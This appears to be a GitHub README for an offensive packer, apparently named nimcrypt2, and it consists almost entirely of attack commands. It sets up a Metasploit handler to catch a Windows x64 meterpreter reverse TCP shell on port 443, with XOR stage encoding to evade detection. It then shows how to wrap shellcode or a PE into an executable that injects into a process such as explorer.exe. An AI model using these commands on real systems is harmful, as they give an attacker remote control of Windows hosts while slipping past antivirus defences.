You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
msfconsole -q
use exploit/multi/handler
set LHOST 10.10.15.45
set LPORT 443
set payload windows/x64/meterpreter/reverse_tcp
set EXITFUNC thread
set autoloadstdapi false
set autosysteminfo false
set enablestageencoding true
set stageencoder x64/xor_dynamic
run -j
Nimcrypt and Shellcode / PE
Generate your shellcode blob
Select a process to inject into, the default process is explorer.exe
If the process is not started, nimcrypt will spawn it and then inject into it
Shellcode
./nimcrypt2 -f shellcode.bon -t raw -o filename.exe -p process-name
PE
./nimcrypt2 -f shellcode.exe -t pe -o filename.exe